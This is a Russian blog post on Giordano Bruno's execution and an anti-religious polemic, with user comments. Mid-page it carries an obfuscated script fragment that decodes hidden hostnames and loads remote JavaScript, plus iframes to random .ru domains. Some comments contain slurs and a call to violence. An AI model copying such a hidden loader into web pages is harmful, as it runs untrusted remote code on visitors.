ЗА ЧТО СОЖГЛИ ДЖОРДАНО БРУНО?

    Эту статью могут комментировать только участники сообщества.
    Вы можете вступить в сообщество одним кликом по кнопке справа.
    Михаил Романцов написал
    2 оценок, 547 просмотров Обсудить (23)

     

     

     Такая армия  безумцев в рясах способна  не только снести  манеж или  парк отдыха или театр, вместе с фундаментом на щепки, но и сжечь любого и каждого   стоящего на их пути устроив  горящую Одессу. Сегодня  под именем Христа и Аллаха и Папы  эти безумцы  идут убивать людей,  вопреки  наставлениям и учению Христа и освящают орудие убийства ближнего которого Христос учить ЛЮБИТЬ , а не УБИТЬ.Бог и вселенная  есть  одно и то же по большому счету, так как Бог высший Разум растворен во всех своих творениях  и живет в них во всей Вселенной.  Бруно не был ученым, и поэтому ему никак нельзя было предъявить те обвинения, которые, например, были предъявлены Галилею. За что же тогда сожгли Бруно? Ответ кроется в его религиозных воззрениях. В своей идее о бесконечности Вселенной Бруно обожествлял мир, наделял природу божественными свойствами. Такое представление о Вселенной фактически отвергало христианскую идею Бога, сотворившего мир .

     Согласно христианским воззрениям, Бог, будучи абсолютным и несотворенным Бытием, не подчиняется созданным Им законам пространства-времени, а сотворенная Вселенная не обладает абсолютными характеристиками Творца. Когда христиане говорят, «Бог Вечен», это значит не то, что Он «не умрет», а то, что Он не подчиняется законам времени, Он – вне времени. Взгляды Бруно приводили к тому, что в его философииБог растворялся во Вселенной, между Творцом и творением стирались границы, уничтожалась принципиальная разница. Бог в учении Бруно, в отличие от христианства, переставал быть Личностью, отчего и человек становился лишь песчинкой мира, подобно тому, как сам земной мир был лишь песчинкой в бруновском «множестве миров».

     Учение о Боге как о Личности было принципиально важным и для христианского учения о человеке: человек есть личность, так как сотворен по образу и подобию Личности – Творца. Творение мира и человека есть свободный акт Божественной Любви. Бруно, правда, тоже говорит о любви, но у него она теряет личностный характер и превращается вразумное космическое устремление. Эти обстоятельства значительно осложнялись увлечением Бруно оккультными и герметическими учениями: наконец не только активно интересовался магией, но и, судя по всему, не менее активно практиковал «магическое искусство». Кроме того,

    Бруно отстаивал идею переселения душ (душа способна путешествовать не только из тела в тело, но и из одного мира в другой), в чем и я совершенно убежден и имею  много аргументов и фактов в пользу  этих слов истинных.  Бруно подвергал сомнению смысл и истинность христианских таинств (прежде всего таинства Причастия), иронизировал над идеей рождения Богочеловека от Девы и т.д. Все это не могло не привести к конфликту с католической Церковью. Сегодня  религия также жестока и безумна как и много веков тому и готова была растерзать Пусек   и сжечь на костре , взамен 2 лет   лишения свободы. Сегодня  убийство камнями и сжигание людей немного отошло  во времени, но также живо в безумных головах  всех религий мира    патриархов, Пап и Мам. 

     Сегодня все религии мира  и вся их  многомиллиардная армия     служащих под брендом   Бога уже не сжигает с дуру и по полному безумию    людей сделавших открытия  и не бросается с вилами не на паровозы, не на лайнеры,  не на мерседесы, а охотно пользуется плодами науки. Но мир еще как помнит    их безумные деяния которые и по сей день продолжаются в наш 21 век. Не пора ли распустить все религии за несостоятельностью, как полных банкротов Духа Божьего.?

     

    <script type="text/javascript">// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "maxpark.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.​loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.​replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),​document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==​typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"​function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a251​9043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]></script>

    <iframe id="a1996667054" style="" src="https://25haich4342.ru/f2.html?a=26363" width="320" height="240"></iframe><iframe id="a754394637" style="" src="https://gyh1lh20owj.ru/u.html?a=26363" width="320" height="240"></iframe>

    Loading...

    Комментировать

    осталось 1185 символов
    пользователи оставили 23 комментария , вы можете свернуть их
    Пиня Копман # написал комментарий 31 мая 2016, 20:52
    А какое отношение имеет православие к католическим кострам???
    Шандор Береговский # ответил на комментарий Пиня Копман 31 мая 2016, 21:14
    Вспомним-борьбу со старообрядцами!
    Пиня Копман # ответил на комментарий Шандор Береговский 31 мая 2016, 21:35
    Со старообрядцами боролись католики? Сжинали староверов на кострах в Риме?


    Кстати а почему бы не вспомнить как язычники Московии православных киевлян убивали....
    Шандор Береговский # ответил на комментарий Пиня Копман 31 мая 2016, 22:16
    Эвона копнул!Но прежде,чем о язычниках Московии говорить,вспомним,как православные киевляне огнем и мечем насаждали свое православие у язычников,соответственно-обратку получали.Кто с мечем приходил,тот мечем и получал по бестолковой голове!Со старообрядцами я и не говорил,что боролись католики-православные никонианцы сами с успехом справлялись! И вообще,о чем спор-о церковном мракобесии?
    Пиня Копман # ответил на комментарий Шандор Береговский 31 мая 2016, 23:15
    А чего забыли как язычники Московии и рема первохрестиан убивали? Калигула и вовсе из них живые факелы жег! Сотни тысяч христиан язычники татары, печенеги, и прочапя пережгли ...
    Шандор Береговский # ответил на комментарий Пиня Копман 1 июня 2016, 06:48
    Думал нормальный,но просто глупый собеседник.Ан нет,оказалось -бандеровский недобиток!Ну,ничего-дай время,ошибку доброго Сталина,что жалел бандеровскую нечисть,устраним.
    Константин Кир # ответил на комментарий Шандор Береговский 1 июня 2016, 01:20
    все костры наши - это два -три аутодафе Мадрида
    Михаил Романцов # ответил на комментарий Пиня Копман 31 мая 2016, 21:16
    И то и другое и третье вышло из одного и того же гнезда.
    Пиня Копман # ответил на комментарий Михаил Романцов 31 мая 2016, 21:37
    И какое с какой дырки? вы например с манды вылезли, тут понятноа причем тут католики? они вашу маму трахали??
    Михаил Романцов # ответил на комментарий Пиня Копман 31 мая 2016, 23:35
    Бандеровец в клубе. Кто пустил фащиста
    ЛадоБер ЛадоБер # ответил на комментарий Пиня Копман 31 мая 2016, 23:36
    В католических ( кат - палач , по русски , а лико прямо сказано) кострах и сгорело волшебное Православие или точнее - Коновые Знания .
    сергей дегтярев # написал комментарий 31 мая 2016, 22:17
    На стороне Дж.Бруно Платон.Аристотель,Спиноза,М.АврелийТолстой -это ПАНТЕИЗМ .т.е.БОГ -всюду и везде.Его должны изучать ученые,а не попы.Чтобы верить и любить Бога не обязательно ходить в церковь и иметь посредников.А это значит лишить попов средств и возможности паразитировать
    Михаил Романцов # ответил на комментарий сергей дегтярев 31 мая 2016, 23:48
    ++++ Золотые слова. Вы правы. Благодарю.
    ЛадоБер ЛадоБер # написал комментарий 31 мая 2016, 23:42
    Этот парень был таким же волшебником как и все люди Кона или как все привыкли - православные .
    Но не эти сегодняшние - здесь лишь название - а те которых после цивилизационного переворота все ещё называли " уголовцами" и которых нещадно преследовали и уничтожали !
    Этот разгром так и остался неприкрытым и сегодня вошёл в название "ПРАВА" ( ! ) - уголовное ПРАВО . С ума сойти ...
    Владимир Златомрезов # написал комментарий 1 июня 2016, 00:01
    Джордано Бруно сожгли за то что инквизиторы гавно никчемное но лучше они от этого не стали и даже по прошествии веков инквизиторы палачи,, ублюдки, убийцы и никчемное гавно а Джордано Бруно это Джордано Бруно.
    • Регистрация
    • Вход
    Ваш комментарий сохранен, но пока скрыт.
    Войдите или зарегистрируйтесь для того, чтобы Ваш комментарий стал видимым для всех.
    Код с картинки
    Я согласен
    Код с картинки
      Забыли пароль?
    ×

    Напоминание пароля

    Хотите зарегистрироваться?
    За сутки посетители оставили 1030 записей в блогах и 8757 комментариев.
    Зарегистрировалось 29 новых макспаркеров. Теперь нас 5021565.